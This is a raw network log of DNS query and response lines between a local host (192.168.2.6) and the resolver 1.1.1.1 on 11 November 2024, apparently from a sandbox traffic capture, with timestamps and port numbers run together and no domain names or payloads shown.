                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.814568043 CET5778553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.814568043 CET5773353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.814935923 CET5376653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.815021038 CET6041253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.819856882 CET5276153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.820707083 CET53571041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.820996046 CET5656753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.822714090 CET53586871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.823431015 CET53494361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.823586941 CET53641171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.826874971 CET53595401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.826998949 CET53625371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.827112913 CET53559001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.827348948 CET5293053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.827497005 CET53509951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.828265905 CET53506261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.829878092 CET53527611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.830642939 CET53531851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.831371069 CET5458753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.832699060 CET53577331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.832849026 CET53532941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.836689949 CET53529301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.838969946 CET4979653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.839622974 CET53565671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.846030951 CET53604121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.846342087 CET53577851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.846357107 CET53537661.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.862638950 CET53545871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.864741087 CET6213053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.864975929 CET5617353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.869326115 CET6496553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.869326115 CET6072153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.870069027 CET53497961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.872634888 CET53561731.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.874560118 CET53621301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.876512051 CET6380953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.876513004 CET5274153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.876725912 CET6012753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.876727104 CET4930653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.876889944 CET6393053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.876889944 CET5410853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877022028 CET6351553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877088070 CET5536953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877088070 CET6031353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877976894 CET6136153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877978086 CET5852453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.878283978 CET53649651.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.878339052 CET6324853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.880273104 CET5835253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.881311893 CET5498753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.884294033 CET53638091.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.886439085 CET53635151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.886609077 CET53603131.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.886635065 CET53553691.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.886750937 CET53541081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.887742996 CET53613611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.888190985 CET53585241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.888689995 CET53632481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.891330957 CET53549871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.900541067 CET53607211.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.907130957 CET53527411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.907183886 CET53639301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.907933950 CET53493061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.908379078 CET53601271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.913486004 CET53583521.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.916754961 CET5027353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.917346001 CET6146153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.917346001 CET5194953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.917803049 CET5642953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.917803049 CET5036853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.927063942 CET53519491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.928195953 CET53614611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.949049950 CET53564291.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.949563980 CET53503681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.950197935 CET53502731.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.961081028 CET5455253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.971426964 CET53545521.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.071304083 CET5490053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.084450006 CET6203853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.084577084 CET6398053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.085345984 CET6143053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.095124960 CET53614301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.098835945 CET53639801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.100730896 CET5871253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.104882956 CET53549001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.111995935 CET53587121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.114089966 CET5169853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.115289927 CET53620381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.115691900 CET5988353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.115968943 CET6149753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.119360924 CET5733953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.120893955 CET5752753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.123075962 CET5896953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.124125957 CET53516981.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.124305010 CET53614971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.124670982 CET53598831.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.125169992 CET5796253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.126507044 CET6385853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.127955914 CET5860053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.128983974 CET6132353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.129441023 CET53573391.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.130000114 CET5577653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.132046938 CET53589691.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.136305094 CET53638581.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.137366056 CET53579621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.137979031 CET5631553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.147658110 CET53563151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.147861958 CET5579553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.151146889 CET53575271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.159583092 CET53586001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.160013914 CET53613231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.161212921 CET53557761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.162856102 CET6096853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.162988901 CET6295653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.164395094 CET5923353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.167392969 CET5078953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.168451071 CET5426253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.173029900 CET53609681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.178723097 CET6252553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.178896904 CET5571853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.179511070 CET53557951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.188241005 CET6393953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.188728094 CET5874453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.189227104 CET5931353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.189380884 CET53557181.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.189724922 CET53625251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.190125942 CET5131653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.190788984 CET5593853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.190943956 CET6165153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.191096067 CET6313753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.194062948 CET53629561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.197694063 CET53639391.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.198061943 CET53592331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.198272943 CET53587441.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.198286057 CET53593131.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.198510885 CET53507891.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.199098110 CET6284853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.199601889 CET53542621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.200381041 CET53631371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.201078892 CET53513161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.201725006 CET53616511.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.202320099 CET5574753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.202553034 CET5514153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.202706099 CET5073353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.202868938 CET6083053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.203031063 CET6066353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.203233957 CET5207653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.207597017 CET6256153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.209248066 CET4922553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.209337950 CET53628481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.209600925 CET5891053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.209758043 CET6289253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.210094929 CET5593653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.211731911 CET5779653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.211793900 CET53557471.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.211895943 CET4920453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.212321043 CET53606631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.212347031 CET53507331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.212878942 CET53551411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.213747978 CET53608301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.216758013 CET6253053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.218492031 CET5849553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.219810009 CET53628921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.219923973 CET5166253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.221191883 CET53559381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.221307993 CET53492041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.221342087 CET6193853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.221759081 CET53589101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.222589970 CET5616353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.222776890 CET6543553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.222944975 CET53577961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.222986937 CET5116653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.223011017 CET6290253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.223531961 CET6426953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.223581076 CET5124053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.227929115 CET53625301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.228473902 CET53619381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.229007959 CET53559361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.229156017 CET6302053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.230017900 CET5873653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.230739117 CET5886153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.230739117 CET6179953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.231937885 CET5173153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.231966019 CET53642691.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.232171059 CET5144253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.232284069 CET53561631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.232625961 CET53654351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.232806921 CET53629021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.234163046 CET53512401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.235997915 CET53520761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.238717079 CET53625611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.240607023 CET53630201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.240617037 CET53587361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.241473913 CET53617991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.242153883 CET53492251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.244816065 CET53514421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.251131058 CET53584951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.251534939 CET53516621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.254096031 CET53511661.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.261876106 CET53588611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.263149977 CET53517311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.002726078 CET5803853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.002727032 CET6015753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.009799957 CET5847553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.011269093 CET4941653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.022600889 CET53494161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.022619963 CET53584751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.030677080 CET6223753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.031539917 CET5105253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.039778948 CET53622371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.053702116 CET5513553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.057145119 CET5593153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.063616037 CET53510521.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.066457033 CET53551351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.089165926 CET53559311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.095326900 CET5718753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.101248980 CET6342653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.105340958 CET53571871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.111866951 CET53634261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.112459898 CET5032953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.114927053 CET6343653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.122937918 CET53503291.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.131351948 CET6390853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.136408091 CET5622753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.137840986 CET5301753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.139540911 CET53639081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.140834093 CET6086853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.143655062 CET5582253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.146635056 CET5383753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.147274017 CET5395053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.149153948 CET6042353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.154901981 CET53558221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.159693956 CET53604231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.161333084 CET53539501.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.165787935 CET53538371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.172283888 CET53608681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.184899092 CET6526653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.185172081 CET5896753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.191684008 CET6198853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.197596073 CET53652661.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.198122025 CET5063553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.199353933 CET53589671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.199666977 CET53619881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.200759888 CET53580381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.208800077 CET53506351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.211982012 CET53601571.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.375701904 CET53562271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.376163960 CET53634361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.501667023 CET53530171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.549036026 CET5919253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.556807995 CET53591921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.587047100 CET5333453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.587579012 CET5211753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.587965012 CET4959153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.587965012 CET5689753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.589572906 CET5281753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.591242075 CET5744353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.591902018 CET5678553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.591973066 CET6038053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.592580080 CET5109453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.592580080 CET6175153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.592936993 CET5198753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.593169928 CET6132653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.593316078 CET5904753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.593450069 CET5189953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.597035885 CET53533341.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.597882032 CET53568971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.598663092 CET53567851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.599276066 CET5980953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.599277020 CET6238753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.599634886 CET6370853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.600224972 CET53528171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.602662086 CET53603801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.603669882 CET53590471.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.610174894 CET53598091.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.624800920 CET5193053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.631608009 CET6027253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.631608009 CET5013853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.631844044 CET6310853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.632323980 CET5089853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.632567883 CET6452753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.632946014 CET6374253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.633570910 CET5481753192.168.2.61.1.1.1
